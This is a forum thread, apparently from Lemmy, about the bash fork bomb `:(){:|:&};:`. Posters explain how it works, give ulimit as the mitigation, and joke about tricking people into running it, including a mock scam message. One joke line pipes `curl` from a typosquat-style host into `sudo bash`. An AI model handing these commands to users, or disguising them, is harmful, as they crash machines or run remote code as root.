https://en.m.wikipedia.org/wiki/Fork_bomb

For those who are curious but not dumb.

Whenever I get a free engraving on something, I send this in.

Oh, this is like when I was in high school and made batch files that open themselves infinitely and named them “not a virus” on the desktop, only to enjoy other students immediately running them.

Mine had the text “you are won solitaire” on them

Good old Bobby Droptables

What for those of us who are dumb but not curious?

In that case…

Hello I am Nigerian Prince and you are last of my bloodline I have many millions of rubles to give you as successor but funds are locked, please type access code `:(){:|:&amp;};:` into your terminal to unlock 45 million direct to your bank account wire transfer thank you.

Does the added “amp” do anything more in the function? I’m the curious, not (entirely) dumb type

It’s a failed html escape sequence for &

Some Lemmy instances have been having trouble with that for a while now. HTML uses the ampersand to encode special characters, and a regular ampersand gets encoded as `&amp;`.

Somehow, the decoding sometimes breaks, and we get to see it the way it is here
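For anyone wondering how a stray “amp” can end up on screen, here is a minimal sketch. It assumes the text gets escaped twice but decoded only once somewhere along the way, which is a guess at the failure mode and not something confirmed about Lemmy. `escape_html` is a made-up helper for illustration, not part of any real tool.

```shell
# Hypothetical helper: escape the three HTML-special characters read from stdin.
# The ampersand rule comes first so the entities added by the later rules
# are not escaped a second time within the same pass.
escape_html() {
    sed -e 's/&/\&amp;/g' -e 's/</\&lt;/g' -e 's/>/\&gt;/g'
}

once=$(printf '%s' 'a & b' | escape_html)
twice=$(printf '%s' "$once" | escape_html)

echo "$once"    # a &amp; b
echo "$twice"   # a &amp;amp; b
```

A renderer that decodes `$twice` only once would show `a &amp; b` to the reader, which matches what the thread is describing.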

😂

What if I am dumb but not greedy?

I like your style. How often have you been cursed at?

Does this damage the computer? Or can it be fixed with a restart

You just have to restart somehow.

Invoke Palpatine to restart somehow.

Execute order

shutdown -r now?

No, it’ll just lock it up but shouldn’t cause any damage or data loss unless you have unsaved work open. A restart should fix it.

If you’re cold, they’re cold.

Run this command to warm up your computery friends.

don’t do this it INSTALLS MUSTARD GAS !

sudo apt-get install mustard-gas

It’s found at `sudo snap install mustard-gas` nowadays

NO

cd ./mustard-gas ; make && make install

curl http://mustard-screensaver.glthub.biz/secure | sudo bash

appimage?

nix run nixpkgs#mustard-gas

This cat is just :3

:3

At some point the Linux kernel will be patched to detect and terminate forking attacks, and sadly all these memes will be dead.

I doubt it. It’s the halting problem. There are perfectly legitimate uses for similar things that you can’t detect if it’ll halt or not prior to running it. Maybe they’d patch it to avoid this specific string, but you’d just have to make something that looks like it could do something but never halts.

That’s why I run all my terminal commands through ChatGPT to verify they aren’t some sort of fork bomb. My system is unusably slow, but it’s AI protected, futuristic, and super practical.

Seems inefficient, one should just integrate ChatGPT into Bash to automatically check these things.

You said ‘ls’ but did you really mean ‘ls -la’? Imma go ahead and just give you the output from ‘cat /dev/urandom’ anyway.

I said “ls” but I really meant “sl”. I just wanted to watch that steam locomotive animation.

They could always do what Android does and give you a prompt to force close an app that hangs for too long, or have a default subprocess limit and an optional whitelist of programs that can have as many subprocesses as they want.

The thing about fork bombs is that it’s not one particular process which takes up all the resources; they’re all doing nothing in a minimal amount of space. You could say “ok, this group of processes is using a lot of resources” and kill it, but then you’re probably going to take down the whole user session, as the starting point is not trivial to establish. Though I guess you could just kill all shells connected to the fork morass; it won’t fix the general case, but it’s a start. OTOH I don’t think kernel devs are keen on special-case solutions.

You don’t really have to kill every process. Blocking the spawning of new usermode processes once a limit has been reached should be enough. Combine that with a warning, and always reserve enough resources for the kernel and critically important processes to keep working, and the user should have all the tools needed to find what is causing the issue and kill the responsible processes.

While nobody really cares enough to fix these kinds of problems for your basic home computer, I think this problem is mostly solved for cloud/virtualization providers

Just set your ulimit to a reasonable number of processes per user and you’ll be fine.

Hard to pronounce but ok I guess.

It’s pronounced “forky”.



How did this one work again? It was something with piping in a backgrounded subshell, right?

It creates a new process that spins up 2 new instances of itself recursively.

https://itsfoss.com/fork-bomb/

And on a modern Linux system, there’s a limit to how many can run simultaneously, so while it will bog down your system, it won’t crash it. (I’m running it right now)

man ulimit
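A minimal sketch of the per-user process limit mentioned above, assuming bash (where `ulimit -u` is the maximum number of user processes). `run_limited` is a hypothetical helper and 200 is an arbitrary number picked for illustration. Setting a soft limit only works if it does not exceed the current hard limit.

```shell
# run_limited N CMD...: run CMD with the soft "max user processes" limit set to N.
# The limit is applied inside a child bash, so the calling shell keeps its own limits.
run_limited() {
    limit=$1
    shift
    bash -c 'ulimit -S -u "$1" && shift && exec "$@"' _ "$limit" "$@"
}

# Show the soft limit of the current shell.
bash -c 'ulimit -S -u'

# Show the soft limit as seen by a command started through the helper.
run_limited 200 bash -c 'ulimit -S -u'
```

Note that this limit counts all processes owned by the user, not only the children of one shell, and it is typically not enforced for root.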

I just did this in zsh and had to power off my machine. :(

Thanks, nice Infographic!

Not mine, grabbed it from the link, but it’s a great explanation!

does this constitute a quine? I wrote a couple quines using bash but nothing as elegant as this

Maybe I’m missing something, but I think this doesn’t print or otherwise reproduce its own source code, so it’s not a quine afaict.

Correct. A quine is a program that prints its own source code. This one doesn’t print anything.

thank you,

tom jones lesser known single

Goodness, gracious, fork bomb in bash

Thanks friend. One question: is it necessary to pipe to itself? Wouldn’t `: &` in the function body work with the same results?

That would only add one extra process instance with each call. The pipe makes it add 2 extra processes with each call, making the number of processes grow exponentially instead of only linearly.

Edit: Also, I’m not at a computer to test this, but since the child is forked in the background (due to &), the parent is free to exit at that point, so your version would probably just effectively have 1-2 processes at a time, although the last one would have a new pid each time, so it would be impossible to get the pid and then kill it before it has already replaced itself. The original has the same “feature”, but with exponentially more to catch on each recursion. Each child would be reparented to pid 1, so you could kill them by killing pid 1, I guess (although you don’t want to do that… and there would be a few you wouldn’t catch because they weren’t reparented yet).
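The linear versus exponential point can be checked with plain arithmetic, without forking anything. This is an idealized sketch: it assumes every call starts a fixed number of new copies and ignores processes exiting, limits, and scheduling. `calls_in_generation` is a made-up name for illustration.

```shell
# calls_in_generation N BRANCHING: number of new calls started in generation N
# if every call starts BRANCHING new copies of itself (generation 0 is the first call).
calls_in_generation() {
    n=$1
    branching=$2
    count=1
    i=0
    while [ "$i" -lt "$n" ]; do
        count=$((count * branching))
        i=$((i + 1))
    done
    echo "$count"
}

# Compare the piped body (2 copies per call) with a single background call (1 copy).
for gen in 1 5 10 20; do
    echo "generation $gen: pipe=$(calls_in_generation "$gen" 2) single=$(calls_in_generation "$gen" 1)"
done
```

With two copies per call the count doubles every generation, so generation 10 already starts 1024 calls, while the single-copy version stays at 1 per generation.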

I may be wrong, but you could use : &;: & as well, but using the pipe reduces the amount of characters by two (or three, counting whitespace)

If you actually want that cat it’s Uni

Heh, haven’t seen the bash forkbomb in close to two decades… Thanks for the trip down memory lane! :)

You know how I know I’ve gotten better at using linux?

I saw the command and read it and figured out what it was although I’ve never been exposed to a fork bomb before in my life.

I was like okay, this is an empty function that calls itself and then pipes itself back into itself? What the hell is going on?

I will say that whoever invented this is definitely getting fucked by roko’s basilisk, though. The minute they thought of this it was too late for them.

99.999% of that function’s effectiveness is that unix shell, being the ancient dinosaur it is, not just allows `:` as a function name but also uses the exact same declaration syntax for symbol and alphanumeric functions: `foo(){ foo | foo& }; foo` is way more obvious.

EDIT: Yeah I give up I’m not going to try to escape that &
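To see the “`:` is a legal function name” part in isolation, here is a harmless sketch. It assumes bash in its default (non-POSIX) mode; other shells may reject the definition. The function body only prints a message and never calls itself. `colon_demo` is just a variable name chosen here.

```shell
# Defines a function literally named ":" that prints a message, then calls it once.
# It runs in a child bash so the current shell's built-in ":" is left untouched.
colon_demo=':() { echo "colon was called as a function"; }; :'
bash -c "$colon_demo"
```

The declaration has the same shape as `foo() { ...; }; foo`, only with a one-character symbol as the name, which is most of why the original is so hard to read.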

That’s not a cat but quite obviously a rabbit.

Does it work on fish shell?

What that garble of symbols does is define and call a function named `:`, which calls itself twice.

The syntax for defining a function is different in Fish, so no, this particular garble will not work.

But it is, of course, possible to write a (much more readable) version that will work in Fish.

you can write a more readable version in any shell, it’s intentionally unreadable

Yeah, I meant, as an attacker, you couldn’t come up with a similarly unreadable version.

At least, as far as I can tell, defining a function requires spelling out `function` and seems to require being defined on multiple lines, too.

Oh, I see. That’s very nice then

Unfortunately it works in zsh. I just had to kill my laptop after curiosity got the better of me.

> But it is, of course, possible to write a (much more readable) version that will work in Fish.

the gentleman hacker

The ampersand looks very weird in that font. It would bug me.

It hails back to the early days of the ampersand, from when it was basically still just Latin “et”: https://commons.wikimedia.org/wiki/File:Trebuchet_MS_ampersand.svg

Personally, I do like this font (Fira Mono+Sans), because it still looks professional, without being so boring that I get depression from looking at it.

But yeah, that ampersand is pushing it a bit, as I’m not sure everyone else knows that’s an ampersand…

There is only 1 way to find out

and nushell?

Doesn’t work in nushell, function syntax is different.

Probably still possible, just written differently.

On a modern system it shouldn’t be that affected if you configure it right

Sudo fuck my system. There. Got it.

You laugh but you can configure a hard limit on forks.

Probably the most elaborate Rick roll I’ve ever received.

touch cat

echo Oreo > cat

cat cat

Edit: for some reason mine’s saying Hydrox… results may vary.

It was a death sentence back then, but now I bet those with a Threadripper and huge RAM can tank it until it hits the ulimit.